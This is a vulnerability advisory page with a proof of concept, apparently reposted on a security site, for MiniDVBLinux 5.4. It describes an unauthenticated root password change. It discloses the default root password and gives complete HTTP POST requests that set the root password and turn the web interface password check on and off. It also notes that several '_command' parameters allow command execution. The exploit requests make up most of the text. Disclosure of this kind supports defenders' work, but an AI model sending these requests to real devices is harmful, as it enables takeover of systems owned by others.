MiniDVBLinux 5.4 Change Root Password

2022.10.17
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows a remote attacker to change the root password of the system without authentication (disabled by default) and verification of previously assigned credential. Command execution also possible using several POST parameters. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5715 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php 24.09.2022 -- Default root password: mld500 Change system password: ----------------------- POST /?site=setup&section=System HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 778 Content-Type: application/x-www-form-urlencoded Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba Host: ip:8008 Origin: http://ip:8008 Referer: http://ip:8008/?site=setup&section=System Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 sec-gpc: 1 APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+ Pretty post data: APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: r00t BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Kumanovo KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: SYSTEM_PASSWORD Eenable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 WEBIF_PASSWORD_CHECK: 1 action: save params: changed: WEBIF_PASSWORD_CHECK Disable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: WEBIF_PASSWORD_CHECK


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top